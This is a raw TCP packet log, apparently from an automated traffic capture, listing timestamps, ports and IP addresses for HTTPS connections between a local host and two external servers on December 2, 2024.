                                                  Dec 2, 2024 07:25:00.107481956 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.107566118 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.107573032 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.110529900 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.110594034 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.110600948 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.112903118 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.113008022 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.113015890 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.116528034 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.116607904 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.116616964 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.119599104 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.119669914 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.119676113 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.122440100 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.122529984 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.122536898 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.125696898 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.125766993 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.125773907 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.129394054 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.129443884 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.129453897 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.132329941 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.132427931 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.132436037 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.135263920 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.135337114 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.135344982 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.138884068 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.138969898 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.138981104 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.141866922 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.141966105 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.141973972 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.144825935 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.144939899 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.144948006 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.165021896 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.314362049 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.314439058 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.314450026 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.317276001 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.317338943 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.317348003 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.321022034 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.321079969 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.321086884 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.323949099 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.324045897 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.324053049 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.326731920 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.326809883 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.326817036 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.330574036 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.330672979 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.330678940 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.333408117 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.333468914 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.333475113 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.336276054 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.336375952 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.336381912 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.339967966 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.340029955 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.340035915 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.343384027 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.343456984 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.343462944 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.346292019 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.346446991 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.346453905 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.349064112 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.349123001 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.349128962 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.352830887 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.352914095 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.352921963 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.355751991 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.355803967 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.355811119 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.358620882 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.358670950 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.358678102 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.513905048 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.514040947 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.514070034 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.515855074 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.515863895 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.515923023 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.515933037 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.518810034 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.518817902 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.518881083 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.518889904 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.519697905 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.523055077 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.523063898 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.523137093 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.523144007 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.525902033 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.525962114 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.525969982 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.526932955 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.528529882 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.528584003 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.528589964 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.532067060 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.532125950 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.532135010 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.534981966 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.535044909 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.535053968 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.537175894 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.537848949 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.537905931 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.537925005 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.541552067 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.541608095 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.541615963 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.544825077 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.544883966 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.544891119 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.547863007 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.547909975 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.547916889 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.550276995 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.550607920 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.550672054 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.550679922 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.554327965 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.554421902 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.554430962 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.557349920 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.557411909 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.557420015 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.560178995 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.560240030 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.560247898 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.560347080 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.619857073 CET44349170188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:25:00.619956970 CET49170443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:25:00.714786053 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.714922905 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.714937925 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.716023922 CET44349169188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:25:00.716098070 CET49169443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:25:00.717263937 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.717319012 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.717325926 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.719968081 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.720027924 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.720033884 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.721810102 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.723701000 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.723769903 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.723776102 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.726667881 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.726723909 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.726733923 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.730381012 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.730437994 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.730444908 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.733222008 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.733273029 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.733278990 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.736191988 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.736248016 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.736254930 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.739866972 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.739926100 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.739937067 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.742743969 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.742796898 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.742804050 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.746045113 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.746099949 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.746107101 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.746375084 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.749001026 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.749069929 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.749075890 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.752906084 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.752965927 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.752971888 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.753747940 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.755584002 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.755640984 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.755646944 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.758518934 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.758574963 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.758582115 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.761073112 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.762212038 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.762264013 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.762271881 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.764509916 CET49170443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:25:00.764539003 CET44349170188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:25:00.764918089 CET44349170188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:25:00.765059948 CET49170443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:25:00.851279020 CET49169443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:25:00.851327896 CET44349169188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:25:00.851777077 CET44349169188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:25:00.851825953 CET49169443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:25:00.892043114 CET49170443192.168.2.22188.114.96.6
                                                  Dec 2, 2024 07:25:00.916337013 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.916397095 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.916407108 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.918435097 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.918442011 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.918493032 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.918502092 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.918545008 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.922178030 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.922184944 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.922231913 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.922240019 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.925136089 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.925189972 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.925199032 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.927973032 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.928023100 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.928030968 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.931740999 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.931794882 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.931802988 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.934566975 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.934626102 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.934633970 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.937449932 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.937489986 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.937498093 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.937508106 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.939335108 CET44349170188.114.96.6192.168.2.22
                                                  Dec 2, 2024 07:25:00.941124916 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.941175938 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.941183090 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.944102049 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.944154978 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.944161892 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.947448969 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.947504044 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.947511911 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.950282097 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.950331926 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.950349092 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.954049110 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.954097033 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.954104900 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.956898928 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.956952095 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.956959009 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.959741116 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.959790945 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.959798098 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.963481903 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:00.963531017 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:00.963538885 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.117729902 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.117799997 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.117818117 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.120898008 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.120907068 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.120963097 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.120971918 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.123652935 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.123661041 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.123713017 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.123720884 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.126698971 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.126739979 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.126753092 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.126760960 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.126805067 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.130315065 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.130323887 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.130377054 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.130384922 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.133148909 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.133202076 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.133208990 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.136133909 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.136181116 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.136188030 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.139828920 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.139883041 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.139889956 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.142776012 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.142836094 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.142843008 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.145641088 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.145699024 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.145705938 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.149015903 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.149071932 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.149077892 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.152657032 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.152714014 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.152723074 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.155505896 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.155565023 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.155571938 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.158468962 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.158521891 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.158529043 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.162166119 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.162218094 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.162225962 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.165155888 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.165208101 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.165216923 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.360275030 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.527072906 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.527085066 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.527122021 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.527136087 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.527143955 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.527159929 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.527168036 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.527168036 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.527192116 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.527200937 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.527230024 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.527399063 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.527419090 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.527430058 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.527462006 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.527462006 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.527487040 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.527492046 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.527520895 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.527548075 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.527574062 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.527581930 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.527667046 CET49167443192.168.2.22142.215.209.77
                                                  Dec 2, 2024 07:25:01.528187990 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.528196096 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.528259993 CET44349167142.215.209.77192.168.2.22
                                                  Dec 2, 2024 07:25:01.528265953 CET49167443192.168.2.22142.215.209.77
